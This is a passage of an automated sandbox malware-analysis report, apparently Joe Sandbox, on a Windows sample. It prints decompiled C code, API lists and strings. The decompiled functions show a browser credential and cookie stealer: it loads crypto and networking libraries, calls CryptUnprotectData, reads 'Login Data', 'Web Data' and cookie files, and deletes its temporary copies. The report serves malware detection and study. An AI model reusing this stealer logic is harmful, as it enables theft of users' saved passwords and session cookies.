HttpOpenRequestW, xrefs: 00401739
GetClientRect, xrefs: 004015DE
Bcrypt.dll, xrefs: 004010A3
ExitProcess, xrefs: 004012A2
CloseHandle, xrefs: 004011D8
CopyFileW, xrefs: 0040120E
StrToIntA, xrefs: 004014C0
InternetReadFile, xrefs: 0040171F
LoadLibraryW, xrefs: 00401030
GetFileSize, xrefs: 004010DC
lstrcmpiW, xrefs: 00401398
CryptUnprotectData, xrefs: 004016A0
FreeLibrary, xrefs: 00401232

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: Advapi32.dll$Bcrypt.dll$CharUpperW$CloseHandle$CoCreateInstance$CoInitialize$ConvertSidToStringSidW$CopyFileW$CreateFileW$CreateMutexW$CreateProcessWithTokenW$CreateToolhelp32Snapshot$Crypt32.dll$CryptBinaryToStringW$CryptStringToBinaryA$CryptStringToBinaryW$CryptUnprotectData$DeleteFileW$DuplicateTokenEx$EnumDisplayDevicesW$ExitProcess$FindClose$FindFirstFileW$FindNextFileW$FreeLibrary$GetClientRect$GetCurrentProcess$GetDC$GetDesktopWindow$GetDriveTypeW$GetEnvironmentVariableW$GetFileSize$GetLastError$GetLocaleInfoW$GetLogicalDriveStringsW$GetModuleFileNameW$GetProcAddress$GetSystemInfo$GetSystemMetrics$GetSystemWow64DirectoryW$GetTimeZoneInformation$GetTokenInformation$GetUserDefaultLCID$GetUserDefaultLocaleName$GetUserNameW$GlobalAlloc$GlobalFree$GlobalMemoryStatusEx$HeapFree$HttpOpenRequestW$HttpQueryInfoA$HttpQueryInfoW$HttpSendRequestW$InternetCloseHandle$InternetConnectW$InternetOpenUrlA$InternetOpenUrlW$InternetOpenW$InternetReadFile$InternetReadFileExW$InternetSetOptionW$LoadLibraryW$LocalAlloc$LocalFree$MultiByteToWideChar$Ole32.dll$OpenMutexW$OpenProcess$OpenProcessToken$PathCombineW$PathMatchSpecW$Process32First$Process32Next$ReadFile$RegCloseKey$RegEnumKeyExW$RegOpenKeyExW$RegQueryValueExW$ReleaseDC$SHGetFolderPathW$SHGetSpecialFolderPathW$SetCurrentDirectoryW$SetEnvironmentVariableW$Shell32.dll$ShellExecuteW$Shlwapi.dll$Sleep$StrCpyW$StrRChrW$StrStrA$StrStrIW$StrStrW$StrToInt64ExW$StrToIntA$StrToIntW$SystemFunction036$User32.dll$WideCharToMultiByte$WinInet.dll$WriteFile$kernel32.dll$lstrcmpA$lstrcmpW$lstrcmpiW$lstrcpyA$lstrcpynA$lstrlenA$lstrlenW$wsprintfW
API String ID: 2238633743-713005165
Opcode ID: e028293d92a6d1446fa316ab8758502f4985f86e5f7caba5ca57395c6088599a
Instruction ID: 478e95b91b71f65d022eb20dd3102177344006f4c0d5f92c9651a9cba786d8dc
Opcode Fuzzy Hash: e028293d92a6d1446fa316ab8758502f4985f86e5f7caba5ca57395c6088599a
Instruction Fuzzy Hash: 99125671645220EFD340DFBAEFC1E6937E8AB497003105D36B624F72A1D7B899218B5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040776F Relevance: 66.9, APIs: 32, Strings: 6, Instructions: 395
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 59%

			_entry_() {
				WCHAR* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				char _v32;
				struct HINSTANCE__* _v36;
				struct _SECURITY_ATTRIBUTES* _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v236;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t74;
				char _t77;
				char _t78;
				WCHAR* _t79;
				void* _t80;
				void* _t81;
				void* _t83;
				void* _t85;
				void* _t87;
				signed int _t95;
				void* _t99;
				void* _t100;
				void* _t113;
				void* _t117;
				void* _t123;
				void* _t124;
				void* _t125;
				void* _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				struct _SECURITY_ATTRIBUTES* _t140;
				struct HINSTANCE__* _t156;
				struct HINSTANCE__* _t159;
				void* _t166;
				void* _t181;
				void* _t182;
				char* _t184;
				intOrPtr _t236;
				intOrPtr _t238;
				intOrPtr _t243;
				intOrPtr _t244;
				intOrPtr _t245;
				intOrPtr _t246;
				intOrPtr _t247;
				void* _t258;
				void* _t259;
				WCHAR* _t260;
				void* _t263;
				void* _t264;
				signed int _t265;
				void* _t268;
				struct HINSTANCE__* _t269;
				void* _t271;
				void* _t272;
				void* _t273;
				intOrPtr* _t276;
				void* _t277;
				intOrPtr* _t278;

				E0040100B(); // executed
				 *0x40e064(0);
				_v24 = E0040A4C2("afb5c633c4650f69312baef49db9dfa4");
				E00404027();
				_t184 =  *0x40e04c;
				_push(0x55);
				_push( &_v236);
				if( *_t184() == 0) {
					L4:
					_t260 = L"iqroq5112542785672901323";
					_push(_t260);
					_push(0);
					_push(0x1f0001);
					if( *((intOrPtr*)( *0x40e168))() != 0) {
						ExitProcess(2); // executed
					}
					CreateMutexW(0, 0, _t260);
					if(E0040A0BE() != 0) {
						E0040A1FE();
					}
					_t72 = E00409FD3(0x40d998);
					_t73 = E00409FD3("                                                                ");
					_t74 = E00409FD3("                                                                ");
					_v64 = _t72;
					_v60 = _t73;
					_v56 = _t74;
					_v52 = E00409FD3("                                                                ");
					_v48 = E00409FD3("                                                                ");
					_t77 =  *0x40e314; // 0x7eefd8
					_v32 = _t77;
					_t78 =  *0x40e204; // 0x825d40
					_v28 = 0;
					_v44 = _t78;
					_v40 = 0;
					_t79 = E00408619( &_v32);
					 *_t278 = 0x1000;
					_v8 = _t79;
					_t80 =  *((intOrPtr*)( *0x40e044))(0x40, _t184);
					_v20 = _t80;
					_t81 =  *((intOrPtr*)( *0x40e044))(0x40, 0x618);
					_t258 = E0040A5FA();
					_t83 = E0040A672( *0x40e044);
					_t181 = _t83;
					_t85 = E0040A503( *((intOrPtr*)( *0x40e13c))(_t81,  *0x40e348), _t258);
					_t236 =  *0x40e20c; // 0x825c80
					_t87 = E0040A503(E0040A503(_t85, _t236), _t181);
					_t238 =  *0x40e308; // 0x8157b0
					_t263 = E0040A503(E0040A503(_t87, _t238), _v24);
					_v16 =  *((intOrPtr*)( *0x40e13c))(_v20, _t263);
					LocalFree(_t258);
					LocalFree(_t181);
					LocalFree(_t263);
					_t182 =  *((intOrPtr*)( *0x40e044))(0x40, 0x800);
					_t95 = 0;
					_v12 = 0;
					while(1) {
						_t264 = E0040A4C2( *((intOrPtr*)(_t277 + _t95 * 4 - 0x3c)));
						_push(_t264);
						if( *((short*)(_t264 +  *((intOrPtr*)( *0x40e08c))() * 2 - 2)) != 0x2f) {
							_t264 = E0040A503(_t264, "/");
						}
						_t99 = E00407C62(_t264, _v16, _v8,  &_v44);
						_t278 = _t278 + 0xc;
						_t259 = _t99;
						_t100 =  *((intOrPtr*)( *0x40e08c))(_t259);
						_push(_t264);
						if(_t100 >= 0x40) {
							break;
						}
						LocalFree();
						if(_t259 == 0) {
							LocalFree(_t259);
						}
						_t95 = _v12 + 1;
						_v12 = _t95;
						if(_t95 < 5) {
							continue;
						} else {
							L18:
							LocalFree(_v8);
							LocalFree(_v16);
							_v8 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
							E0040A24A( &_v8);
							if(_t259 == 0) {
								L38:
								LocalFree(_v8);
								LocalFree(_t182);
								ExitProcess(0);
							}
							E0040864C(_t259, _v8);
							_t265 = 0;
							_t113 =  *((intOrPtr*)( *0x40e18c))(_t259,  *0x40e418);
							if(_t113 == 0) {
								L21:
								ExitProcess(0xffffffff);
							}
							_t265 = _t113 - _t259 >> 1;
							_v12 =  *((intOrPtr*)( *0x40e044))(0x40, 0x100);
							_t117 =  *((intOrPtr*)( *0x40e08c))(_t259);
							_t37 = _t265 + 6; // 0x6
							if(E0040A3E4(_t259,  &_v12, _t37, _t117) != 0) {
								_t182 = E0040A503(_t182, _v12);
								LocalFree(_v12);
								_t123 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
								_t124 =  *((intOrPtr*)( *0x40e13c))(_t123, _v8);
								_t243 =  *0x40e258; // 0x825ba0
								_t125 = E0040A503(_t124, _t243);
								_t244 =  *0x40e370; // 0x7fe4c0
								_t126 = E0040A503(_t125, _t244);
								_v20 = _t126;
								_t127 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
								_t128 =  *((intOrPtr*)( *0x40e13c))(_t127, _v8);
								_t245 =  *0x40e258; // 0x825ba0
								_t129 = E0040A503(_t128, _t245);
								_t246 =  *0x40e454; // 0x8156f0
								_v24 = E0040A503(_t129, _t246);
								SetCurrentDirectoryW(_v8);
								GetEnvironmentVariableW( *0x40e2e0,  *((intOrPtr*)( *0x40e044))(0x40, 0x5000), 0x2800);
								_t247 =  *0x40e1e8; // 0x825f00
								_t220 = E0040A503(_t132, _t247);
								_t268 = E0040A503(_t134, _v8);
								SetEnvironmentVariableW( *0x40e2e0, _t268);
								LocalFree(_t268);
								E00409906(_t259, _t182);
								_t140 =  *((intOrPtr*)( *0x40e034))(_v24);
								_v28 = _t140;
								if(_t140 != 0) {
									E00403F9D(_t220, _t140, _t259, _t182);
								}
								_t269 =  *((intOrPtr*)( *0x40e034))(_v20);
								_v36 = _t269;
								if(_t269 != 0) {
									_t166 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
									_v16 = _t166;
									 *0x40e0c4(0, _t166, 0x1a, 0);
									if(E004065D8(_t269) == 0) {
										_t273 = _v16;
									} else {
										_t273 = _v16;
										E0040633E(_t273, _t182, _t269, 0);
									}
									LocalFree(_t273);
								}
								E0040A7DA(_t182);
								E0040ABD8(_t259, _t182);
								E004055B6(_t182);
								E00409BD9(_t259, _t182);
								E00404F7E(_t259, _t182);
								_v12 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t259) + _t149);
								if(E00408A42(_t259,  &_v12) > 0) {
									E00408ADD(_v12, _t182);
								}
								LocalFree(_v12);
								E004073C7();
								_t156 = _v36;
								if(_t156 != 0) {
									FreeLibrary(_t156);
								}
								_t271 = _v20;
								DeleteFileW(_t271);
								LocalFree(_t271);
								_t159 = _v28;
								if(_t159 != 0) {
									FreeLibrary(_t159);
								}
								_t272 = _v24;
								DeleteFileW(_t272);
								LocalFree(_t272);
								LocalFree(_t259);
								goto L38;
							} else {
								ExitProcess(0xfffffffe);
							}
							goto L21;
						}
					}
					_t182 =  *((intOrPtr*)( *0x40e13c))(_t182);
					LocalFree(_t264);
					goto L18;
				}
				_t276 = 0x40e4d8;
				while(1) {
					_push( *_t276);
					_t184 =  &_v236;
					_push(_t184);
					if( *((intOrPtr*)( *0x40e170))() != 0) {
						goto L4;
					}
					_t276 = _t276 + 4;
					if(_t276 != 0x40e4dc) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x0040777b
0x00407783
0x00407793
0x00407796
0x0040779b
0x004077a7
0x004077a9
0x004077ae
0x004077d4
0x004077d9
0x004077de
0x004077df
0x004077e0
0x004077e9
0x004077f8
0x004077f8
0x004077ee
0x00407805
0x00407807
0x00407807
0x00407812
0x0040781e
0x0040782a
0x00407834
0x00407837
0x0040783a
0x00407847
0x0040784f
0x00407855
0x0040785a
0x0040785d
0x00407862
0x00407865
0x00407868
0x0040786b
0x00407876
0x0040787f
0x00407882
0x00407891
0x00407894
0x0040789d
0x0040789f
0x004078b0
0x004078b9
0x004078be
0x004078cf
0x004078d4
0x004078f1
0x004078fa
0x004078fd
0x00407904
0x0040790b
0x00407920
0x00407922
0x00407924
0x00407927
0x00407936
0x00407938
0x00407941
0x0040794f
0x0040794f
0x0040795d
0x00407968
0x0040796b
0x0040796e
0x00407970
0x00407974
0x00000000
0x00000000
0x00407976
0x0040797e
0x00407981
0x00407981
0x0040798a
0x0040798b
0x00407991
0x00000000
0x00407993
0x004079a6
0x004079a9
0x004079b2
0x004079c9
0x004079cc
0x004079d3
0x00407c45
0x00407c48
0x00407c4f
0x00407c57
0x00407c57
0x004079de
0x004079ee
0x004079f1
0x004079f5
0x004079ff
0x00407a01
0x00407a01
0x004079fb
0x00407a15
0x00407a1e
0x00407a21
0x00407a33
0x00407a4a
0x00407a4c
0x00407a5f
0x00407a6b
0x00407a6d
0x00407a75
0x00407a7a
0x00407a82
0x00407a90
0x00407a93
0x00407a9f
0x00407aa1
0x00407aa9
0x00407aae
0x00407abe
0x00407ac1
0x00407ae4
0x00407aea
0x00407afa
0x00407b01
0x00407b0a
0x00407b11
0x00407b19
0x00407b26
0x00407b28
0x00407b2d
0x00407b33
0x00407b39
0x00407b44
0x00407b46
0x00407b4b
0x00407b5a
0x00407b63
0x00407b66
0x00407b75
0x00407b8a
0x00407b77
0x00407b7a
0x00407b81
0x00407b87
0x00407b8e
0x00407b8e
0x00407b98
0x00407ba1
0x00407baa
0x00407bb3
0x00407bbc
0x00407bd6
0x00407be5
0x00407beb
0x00407beb
0x00407bf3
0x00407bfb
0x00407c00
0x00407c05
0x00407c08
0x00407c08
0x00407c0e
0x00407c12
0x00407c19
0x00407c1f
0x00407c24
0x00407c27
0x00407c27
0x00407c2d
0x00407c31
0x00407c38
0x00407c3f
0x00000000
0x00407a35
0x00407a37
0x00407a37
0x00000000
0x00407a33
0x00407991
0x0040799e
0x004079a0
0x00000000
0x004079a0
0x004077b0
0x004077b5
0x004077b5
0x004077bc
0x004077c2
0x004077c7
0x00000000
0x00000000
0x004077c9
0x004077d2
0x00000000
0x00000000
0x00000000
0x004077d2
0x00000000

APIs

Part of subcall function 0040100B: LoadLibraryW.KERNEL32(kernel32.dll,?,?,00407780), ref: 00401016
Part of subcall function 0040100B: GetProcAddress.KERNEL32(00000000,LoadLibraryW), ref: 00401036
Part of subcall function 0040100B: LoadLibraryW.KERNELBASE(WinInet.dll,?,?,?,?,?,00407780), ref: 00401061
Part of subcall function 0040100B: LoadLibraryW.KERNELBASE(Crypt32.dll,?,?,?,?,?,00407780), ref: 00401091
Part of subcall function 0040100B: LoadLibraryW.KERNELBASE(Bcrypt.dll,?,?,?,?,?,00407780), ref: 004010AA
Part of subcall function 0040100B: GetProcAddress.KERNEL32(?,GetProcAddress), ref: 004010B8

CoInitialize.OLE32(00000000), ref: 00407783

Part of subcall function 0040A4C2: LocalAlloc.KERNELBASE(00000040,?,?,?,00000000,00407793), ref: 0040A4E1
Part of subcall function 0040A4C2: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,afb5c633c4650f69312baef49db9dfa4,000000FF,00000000,00000000,?,?,?,00000000,00407793), ref: 0040A4F1

CreateMutexW.KERNEL32(00000000,00000000,iqroq5112542785672901323), ref: 004077EE
ExitProcess.KERNEL32 ref: 004077F8
LocalFree.KERNEL32(00000000), ref: 004078FD
LocalFree.KERNEL32(00000000), ref: 00407904
LocalFree.KERNEL32(00000000), ref: 0040790B
LocalFree.KERNEL32(00000000), ref: 00407976
LocalFree.KERNEL32(00000000), ref: 00407981
LocalFree.KERNEL32(00000000), ref: 004079A0
LocalFree.KERNEL32(?), ref: 004079A9
LocalFree.KERNEL32(?), ref: 004079B2
ExitProcess.KERNEL32 ref: 00407A01
ExitProcess.KERNEL32 ref: 00407A37

Strings

, xrefs: 0040782F
, xrefs: 00407823
, xrefs: 00407842
iqroq5112542785672901323, xrefs: 004077D9, 004077DE, 004077EB
afb5c633c4650f69312baef49db9dfa4, xrefs: 00407789
, xrefs: 00407817

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Local$Free$LibraryLoad$ExitProcess$AddressProc$AllocByteCharCreateInitializeMultiMutexWide
String ID: $ $ $ $afb5c633c4650f69312baef49db9dfa4$iqroq5112542785672901323
API String ID: 1492179042-1031988469
Opcode ID: 0a0d8b2567dfd511483fd131902667ad1f2beff92a239810d1cd299ce7c42da3
Instruction ID: e92a4b87a1a530e7256a75f8bb231f7b298302859da8ec0d9ad369049daf7dae
Opcode Fuzzy Hash: 0a0d8b2567dfd511483fd131902667ad1f2beff92a239810d1cd299ce7c42da3
Instruction Fuzzy Hash: 25D18571E00214ABDB04ABB6DE49E6E77B5AF48310B10483AF905B73D1DF78AD118B5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040A4C2 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 28
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E0040A4C2(char* __ecx) {
				short* _t7;
				int _t11;
				char* _t14;
				short* _t16;

				_t14 = __ecx;
				_t11 =  *((intOrPtr*)( *0x40e198))(__ecx);
				_t7 = LocalAlloc(0x40, 0x10 + _t11 * 2); // executed
				_t16 = _t7;
				MultiByteToWideChar(0xfde9, 0, _t14, 0xffffffff, _t16, _t11);
				_t16[_t11] = 0;
				return _t16;
			}

0x0040a4ca
0x0040a4d5
0x0040a4e1
0x0040a4e4
0x0040a4f1
0x0040a4f9
0x0040a502

APIs

LocalAlloc.KERNELBASE(00000040,?,?,?,00000000,00407793), ref: 0040A4E1
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,afb5c633c4650f69312baef49db9dfa4,000000FF,00000000,00000000,?,?,?,00000000,00407793), ref: 0040A4F1

Strings

afb5c633c4650f69312baef49db9dfa4, xrefs: 0040A4CC, 0040A4E9

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: AllocByteCharLocalMultiWide
String ID: afb5c633c4650f69312baef49db9dfa4
API String ID: 3282395022-3565914107
Opcode ID: 620967e8831f66a80d015b3e32f1d5a571271f4666585bf4ea6a08314ec2853b
Instruction ID: 821f2f2a5b45e58665a0b52f3e5465d9484d76db546a2d81d506fa24111d9f92
Opcode Fuzzy Hash: 620967e8831f66a80d015b3e32f1d5a571271f4666585bf4ea6a08314ec2853b
Instruction Fuzzy Hash: 88E0D8713001207FE21057AA9C84FA76AE8DBC9770F140536F318E72B0D9B01C1083B5

Uniqueness

Uniqueness Score: -1.00%

Function 022BEB40 Relevance: 3.2, APIs: 2, Instructions: 236
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 022BEB86
VirtualProtect.KERNELBASE(?,?,00000000), ref: 022BEDD0

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 6a4e5aa6d90b8b3ed13825a8e48c3be58f940a9f27a0826dba1cadd81984fabe
Instruction ID: 20dbecf73766e2a0432239d547d0fef44368e9e0a542c50839802466f9b9d5a7
Opcode Fuzzy Hash: 6a4e5aa6d90b8b3ed13825a8e48c3be58f940a9f27a0826dba1cadd81984fabe
Instruction Fuzzy Hash: 8AB1A9B5A00209DFCB09CF88C891EEEBBB6BF88354F558558E9099B355D770E981CF90

Uniqueness

Uniqueness Score: -1.00%

Function 022BE620 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 022BE6A4

Strings

VirtualAlloc, xrefs: 022BE689, 022BE68C

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction ID: 9fd8f2654060b4702380c08b5683a4a90e1624a5d3e2aa0ef0ba12fe39154f72
Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction Fuzzy Hash: 09110060D08389DAEF01D7E894097FEBFB55F11704F044098D9457A282D6BA57588BA6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00402CB8 Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 440
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LocalFree.KERNEL32(00000000), ref: 00402D47

Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701

StrCpyW.SHLWAPI(?,?), ref: 00402D87
LocalFree.KERNEL32(00000000), ref: 00402D92
LocalFree.KERNEL32(00000000), ref: 00402DA1
LocalFree.KERNEL32(00000000), ref: 00402DB0
LocalFree.KERNEL32(00000000), ref: 00402DBF
LocalFree.KERNEL32(00000000), ref: 00402DCA
DeleteFileW.KERNEL32(?), ref: 00402F30
LocalFree.KERNEL32(?), ref: 00402F37
LocalFree.KERNEL32(00000000), ref: 00402F4F
wsprintfW.USER32 ref: 00403102
lstrlenW.KERNEL32(00000000), ref: 0040310C
wsprintfW.USER32 ref: 004031A6
lstrlenW.KERNEL32(00000000), ref: 004031B0
LocalFree.KERNEL32(00000000), ref: 004031CB
LocalFree.KERNEL32(?), ref: 004031D4
LocalFree.KERNEL32(00000000), ref: 004031E2
LocalFree.KERNEL32(00000000), ref: 004031EC
DeleteFileW.KERNEL32(?), ref: 00403223

Strings

Cookies, xrefs: 00402DE9
TRUE, xrefs: 004030EA, 004030F5, 0040318C, 00403199
v10, xrefs: 0040308D
FALSE, xrefs: 004030E5, 00403191
Network\Cookies, xrefs: 00402DE0

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFilelstrlenwsprintf
String ID: Cookies$FALSE$Network\Cookies$TRUE$v10
API String ID: 2479234762-3249080094
Opcode ID: ca82027ae101a843b685d125fad7f84f8d5a922713a545ea654940957bcd5cc7
Instruction ID: 518071ebf78736c82c0705b89313a0bc18143e80e42b499cd2370e7bd490f6e3
Opcode Fuzzy Hash: ca82027ae101a843b685d125fad7f84f8d5a922713a545ea654940957bcd5cc7
Instruction Fuzzy Hash: A3024C71900219EFDF059FA2EE49AAE7BB5FB08301F104839E911B72A0D7759D20DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00403236 Relevance: 42.4, APIs: 22, Strings: 2, Instructions: 437fileCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000), ref: 004032C3

Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701

LocalFree.KERNEL32(00000000), ref: 00403312
LocalFree.KERNEL32(00000000), ref: 00403321
LocalFree.KERNEL32(00000000), ref: 00403330
LocalFree.KERNEL32(00000000), ref: 0040333B
LocalFree.KERNEL32(00000000), ref: 00403346
LocalFree.KERNEL32(00000000), ref: 0040346B
LocalFree.KERNEL32(?), ref: 00403472
LocalFree.KERNEL32(00000000), ref: 0040349E
LocalFree.KERNEL32(?), ref: 004034A5
LocalFree.KERNEL32(00000000), ref: 00403747
DeleteFileW.KERNEL32(?), ref: 0040374E
LocalFree.KERNEL32(?), ref: 00403755

Strings

Web Data, xrefs: 00403411
v10, xrefs: 004035CA

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFile
String ID: Web Data$v10
API String ID: 2194112602-1846122625
Opcode ID: 95a4d13152d61a2150443ef15e5531f8b924340940afcc281ea8c97043dcaaac
Instruction ID: dd7c25951b04004103893565f422d3d2245e9c7bd2d4e4275fc45d8d731e42ae
Opcode Fuzzy Hash: 95a4d13152d61a2150443ef15e5531f8b924340940afcc281ea8c97043dcaaac
Instruction Fuzzy Hash: A2F1A171900214EFDB15DFA6EE44AAE7BB9FB08311F104839F511B72A0DB759A20CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004027B8 Relevance: 42.4, APIs: 22, Strings: 2, Instructions: 419
fileCOMMON

Download Yara Rule

C-Code - Quality: 15%

			E004027B8(intOrPtr* __ecx, intOrPtr* __edx, void* __eflags, intOrPtr _a8, intOrPtr _a12, char _a16) {
				signed int _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				void* _v16;
				WCHAR* _v20;
				void* _v24;
				signed int _v28;
				void* _v32;
				void* _v36;
				intOrPtr _v40;
				intOrPtr* _v44;
				void* _v48;
				char _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				char _v72;
				void* _v76;
				char _v80;
				void* _v84;
				char _v88;
				void* _t103;
				void* _t104;
				intOrPtr _t118;
				intOrPtr _t120;
				intOrPtr _t122;
				intOrPtr _t124;
				intOrPtr _t126;
				intOrPtr _t128;
				intOrPtr _t130;
				void* _t134;
				void* _t135;
				void* _t137;
				void* _t146;
				void* _t153;
				void* _t154;
				signed int _t155;
				intOrPtr _t157;
				intOrPtr _t158;
				void* _t160;
				void* _t161;
				WCHAR* _t165;
				void* _t173;
				void* _t174;
				int _t175;
				void* _t184;
				int _t185;
				void* _t190;
				void* _t199;
				intOrPtr* _t203;
				void* _t204;
				intOrPtr* _t205;
				void* _t253;
				signed int _t255;
				void* _t258;
				void* _t259;
				void* _t260;
				char _t261;
				void* _t263;
				void* _t265;
				signed int _t266;
				void* _t267;
				intOrPtr* _t270;
				void* _t271;

				_t203 = __edx;
				_v44 = __ecx;
				_t103 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
				_t104 =  *((intOrPtr*)( *0x40e13c))(_t103, _a12);
				_v8 = _v8 & 0x00000000;
				_t253 = _t104;
				E004017FA(_t253,  &_v8,  &_v52);
				 *_t270 = 0x200;
				_t259 =  *((intOrPtr*)( *0x40e044))(0x40);
				_v48 = _t259;
				E00401934(_v8,  &_v48,  *0x40e044, _v52);
				_v28 = _v28 & 0x00000000;
				_v60 = _t259;
				_v64 = 0x200;
				_t260 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
				_v24 = _t260;
				if(_v8 != 0) {
					LocalFree(_v8);
				}
				_push( &_v72);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v28);
				_push( &_v64);
				if( *((intOrPtr*)( *0x40e0b0))() != 0) {
					_t199 = E0040177F(_v68,  &_v24, _v72);
					_t260 = _v24;
					if(_t199 != 0) {
						 *_t203 =  *((intOrPtr*)( *0x40e13c))( *_t203, _t260);
					}
				}
				if(_v28 != 0) {
					LocalFree(_v28);
				}
				if(_v60 != 0) {
					LocalFree(_v60);
				}
				if(_v68 != 0) {
					LocalFree(_v68);
				}
				if(_t260 != 0) {
					LocalFree(_t260);
				}
				if(_t253 != 0) {
					LocalFree(_t253);
				}
				_t261 = _a16;
				if(_t261 == 0) {
					L57:
					return 0;
				} else {
					_t118 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e1c4);
					 *0x40e4d4 = _t118;
					_t120 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e1f8);
					 *0x40e4c8 = _t120;
					_t122 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e1e0);
					 *0x40e4bc = _t122;
					_t124 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e208);
					 *0x40e4c4 = _t124;
					_t126 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e230);
					 *0x40e4cc = _t126;
					_t128 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e1c0);
					 *0x40e4b8 = _t128;
					_t130 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e224);
					 *0x40e4c0 = _t130;
					 *0x40e4d0 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e1b0);
					_t134 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
					_t135 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
					_v32 = _t135;
					_t263 =  *((intOrPtr*)( *0x40e000))(_t134, _a8, L"Login Data");
					_v56 = _t263;
					_t137 = E0040A69E( *0x40e000,  &_v32);
					_t204 = _v32;
					if(_t137 == 0) {
						L59:
						LocalFree(_t263);
						DeleteFileW(_t204);
						return LocalFree(_t204) | 0xffffffff;
					}
					_push(0);
					_push(_t204);
					_push(_t263);
					if( *((intOrPtr*)( *0x40e184))() == 0) {
						goto L59;
					}
					_push( &_v24);
					_push(_t204);
